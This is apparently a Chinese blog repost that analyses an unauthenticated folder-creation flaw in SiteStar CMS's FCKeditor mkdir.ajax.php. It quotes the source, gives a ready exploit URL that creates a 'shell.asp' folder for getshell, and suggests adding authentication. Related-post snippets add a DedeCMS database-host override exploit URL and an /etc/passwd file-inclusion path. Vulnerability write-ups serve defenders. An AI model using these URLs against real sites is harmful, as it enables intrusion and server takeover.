建站之星php 漏洞,建站之星全版本后台通杀getshell的解析与解决方法

最新推荐文章于 2023-01-07 08:07:44 发布
最新推荐文章于 2023-01-07 08:07:44 发布
阅读量188 收藏
点赞数
文章标签: 建站之星php 漏洞

找到一个fck改的编辑器,准备用解析洞日之。

b_1_201803060200143569.jpg

然后发现无法这玩意直接过滤了“.”创建不了解析文件夹,

反复试了几次之后发现这个过滤是有延迟的。大概在0.1秒后 才会去掉。于是果断查看源码看函数:

复制代码代码如下:

function addsort(obj) {

$(obj).parent().find(‘span’).css(‘display’,'inline-block’);

$(obj).css(‘display’,'none’);

$(obj).parent().find(‘span > input:first’).focus();

}

function newdir(obj) {

var pth = $(obj).prev().attr(‘value’);

var basepth = $(‘#gtcurdir option:selected’).text();

if (pth.replace(/^\s+|\s+$/g,”).length == 0) { //这里对定义的pth变量进行了判断,(“/^\s+|\s+$/g,”),思路是 判断如果文本框内不算以上字符 长度等于0则继续执行.

alert(“请输入字符”);

$(obj).prev().focus();

return false;

} else {

$.ajax({

type : “get”,

datatype : “text”,

url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,//这里直接发送url 基本类型+新文件夹名+文件夹名。

success : function(response) {

switch (response) {

case ’0′:

$(obj).prev().val(”);

$(obj).parent().css(‘display’,'none’);

$(obj).parent().parent().find(‘a’).css(‘display’,'inline-block’);

$(‘’+basepth+pth+’/’).appendto(‘#gtcurdir’);

break;

case ‘-1′:

alert(“文件夹已存在!”);

$(obj).prev().focus();

break;

case ‘-2′:

alert(“新建文件夹失败!”);

break;

}

},

error : function(response) {

alert(“请求失败!”);

return false;

}

});

}

看完函数 发现有一个很有意思的地方:

url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,这里直接post出去命令。那么我们可否构造呢

于是查看了这个脚本的源码:

复制代码代码如下:

header(‘conten-type:text/html; charset=utf-8′);

define(‘ssfck’, str_replace(“\\”, “/”, dirname(__file__)));

$adminroot = str_replace(“\\”, “/”, substr(ssfck, 0, -10));

define(‘ssroot’, str_replace(“\\”, “/”, realpath($adminroot.”/..”)));

$err = ’0′;

$basedir = trim($_get['basedir']);//这里直接get来自前面那个urlpost来的变量

$newdir = trim($_get['newdir']);

// is or not exist dir

$hd = dir(“../../”.$basedir);

while(($path = $hd->read()) !== false) {

if ($path == $newdir) {

$err = ‘-1′;

break;

} else continue;

}

if ($err != ‘-1′) {

if (!mkdir(“../../{$basedir}{$newdir}”, 0755)) $err = ‘-2′;

}

echo $err;

?>

程序员果然天然呆,不验证登陆,这里不验证文件名,任凭urlpost任意信息。

到这里知道了程序漏洞所在。附上exp:

http:// /admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp

返回0则表示成功。

修复方案:

对mkdir.ajax.php加验证

如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!

weixin_39959335
关注
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 896
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
php cms 代码注入,PHPCMS全版本通杀SQL注入漏洞
weixin_42458282的博客
04-14 971
漏洞分析首先看下面的代码/phpcms/modules/member/content.php 202行 edit函数[php]public function edit() {$_username = $this->memberinfo['username'];if(isset($_POST['dosubmit'])) {$catid = $_POST['info']['catid'] = i...
建站之星php 漏洞,建站之星任意文件上传漏洞
weixin_34229578的博客
04-04 302
#1 漏洞产生/module/mod_media.phpflash_picker() 和 image_picker() 两个函数image_picker() 函数$typeArr = array('image/jpeg','image/pjpeg');$flash_typeArr = array('image/jpeg','image/pjpeg');$file_info =& Param...
建站之星php 漏洞,建站之星模糊测试实战之任意文件上传漏洞
weixin_39830012的博客
04-04 282
0x00 Sitestar美橙互联又一力作,建站之星专业版(Sitestar Pro),无拘无束,信手拈来,创意无限,不拘一格,轻松创建属于您自己的网站!0x01 漏洞的产生/module/mod_tool.php 第89行起,img_create()函数[php]public function img_create() {$file_info =& ParamHolder::get('i...
php漏洞 wvs,建站之星sitestar v2.5文件包含漏洞利用及修复
weixin_28869849的博客
03-10 350
该楼层疑似违规已被系统折叠隐藏此楼查看此楼无意间发现建站之星sitestar 的一鸡肋文件包含漏洞,WVS扫描一朋友的网站,发现提示有以下文件包含漏洞index.php?_a=fullist&_m=../../../../../../../../../../etc/passwd%00.jpgadmin/index.php?_a=admin_list&_m=../../../../...
uploadify.php 漏洞,建站之星 (SiteStar) v2.0 漏洞大全,上传、注入、任意文件包含(转 )...
weixin_39709979的博客
03-17 402
原文http://lcx.cc/?i=2324前两天拿个站,系统是:建站之星 (SiteStar)v2.0,自己看了看,又综合了网上的各种漏洞,整理了一份漏洞大全,这套程序浑身都是窟窿,无语中……记录时间:2012-3-10 14:24:43By: Nuclear'Atk, Url: Http://lcx.cc/程序名称:建站之星 (SiteStar) v2.0建站之星 SiteStar 网站管理...
全网最全Struts 2 全版本漏洞检测工具,最新struts漏洞更新
04-18
该全版本漏洞检测工具可能包含了针对Struts 2不同版本漏洞检查模块,这些模块可能包括但不限于以下方面: 1. **OGNL漏洞扫描**:检测Struts 2应用中是否存在可被恶意利用的OGNL表达式,如未过滤的用户输入或不...
暗月mysql全版本通杀提权神器-V2014
01-13
暗月mysql全版本通杀提权神器-V2014,亲测真实有效,可用。如有侵权,请联系CSDN管理员删除即可
暗月mysql全版本通杀提权
06-21
"暗月mysql全版本通杀提权"指的是一个针对MySQL的安全漏洞利用,该漏洞可能允许攻击者在目标系统上获取更高的权限,甚至完全控制数据库服务器。 MySQL的权限系统设计用于保护数据安全,允许管理员精细控制用户对...
PHP实例开发源码——MCMS 手机建站之星 php版.zip
11-25
PHP实例开发源码——MCMS 手机建站之星 php
建站之星(sitestar)网站建设系统 v2.7
10-24
SiteStar V2.7版功能说明:增加和改善功能1、站点基本设置中增加地址栏图标上传。2、调整文章、产品按后台顺序值从大到小进行排序显示。3、新增留言模块自定义留言项功能,方便各种网站留言表单需求。4、下载模块中,下载类型新增外部链接方式。5、友情链接、在线客服模块,新增排序字段,可调整显示顺序。6、新增走马灯按后台顺序值从大到小进行排序显示。7、增强公告模块设置滚动速度。8、产品列表显示方式,新增始终打开方式。9、新增批量移动文章或产品到指定分类功能。10、新增文件管理编辑器附件支持doc,docx,xls,xlsx,ppt,pptx,wps,pdf文件格式上传    11、添加页面,页面属性选择下载列表时,新增下载列表支持子类分类选择12、新增会员购物积分功能,需开启。13、访问模式新增自定义链接方式,这样页面地址可以自定义修改,有利于SEO优化。14、新增在线客服浮动窗口为固定展开显示。 修复BUG1、修复对联广告为竖排的形式。2、修复在线客服yahoo图标有语言区分。3、修复产品或文章分类管理中有产品或文章时,不能删除当前分类。4、修改站点基本设置时不会跳转到多语言站点中别
建站之星(sitestar)网站建设系统体验包 V2.6.zip
07-06
建站之星网站建设系统是一种全新的互联网应用模式,它一改过去传统的企业建站方式,不需企业编写任何程序或网页,无需学习任何相关语言,也不需第三方代写或管理网站,只需应用系统所提供的各种强大丰富的功能模块,即可轻松生成企业个性化的精美网站。 SiteStar V2.6版功能说明: 增加和改善功能 1、新增会员自定义注册项功能,方便各种网站用户注册表单需求。 2、新增QQ登录接口,可以使用qq帐号登陆网站。 3、新增站内短信/邮件群发功能,可以针对站内会员进行站内短信群发或者邮件群发,也可单独发送。 4、增强添加页面时可选择是否在新窗口打开。 5、增加banner、logo隐蔵按钮,同时也可以对隐蔵项进行恢复操作。 6、站点基本设置新增网站认证代码项,实现html代码方式的第三方网站在线认证。 7、增加2个多图banner效果。 8、增加模板颜色分类。   修复BUG 1、修复语言包文字错误。 2、修复后台内容编辑器上传图片在二级目录下不显示以及前台简介模块上传图片预览不显示。 3、修复数据库文件太大,无法进行备份与恢复。 4、修复后台产品管理中,复制所选产品或文章到其它语言时无法将简体语言自动转换成繁体。 5、修复只有一二条公告时,会出现重覆显示公告现象。 6、修复Flash幻灯模块,添加幻灯至最多,不上传图片保存后,再次编辑不能编辑更多项。 7、更新财付通支付接口。
建站之星v2.7_build140505去版权最简单的方法
12-02
建站之星v2.7_build140505版去版权的简单方法 主要思路是通过jquery来操作html代码对其进行隐藏。 20141202制作有效 有时官方可能会对html的结构进行修改,但万变不离其踪只要找准对应的html代码就可以通过jquery对其进行隐藏
建站之星破解版_已去版权
12-16
最新的建站之星2.2完美破解版,上传到空间就可以使用,永久免费了,已去商业版权信息,还可以下载模板,亲测好用。
分享102个PHP源码,总有一款适合您
zy0412326的专栏
01-07 1874
php
分享124个PHP源码,总有一款适合您
zdh13370188237的博客
01-05 8364
php
mysql全版本通杀提权神器
最新发布
05-16
MySQL全版本通杀提权神器是一种用于攻击MySQL数据库的工具,其主要目的是获取管理员权限并控制整个数据库服务器,因此具有非常严重的安全漏洞。此类工具往往利用MySQL的系统特性,比如用户定义函数(UDF),然后使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值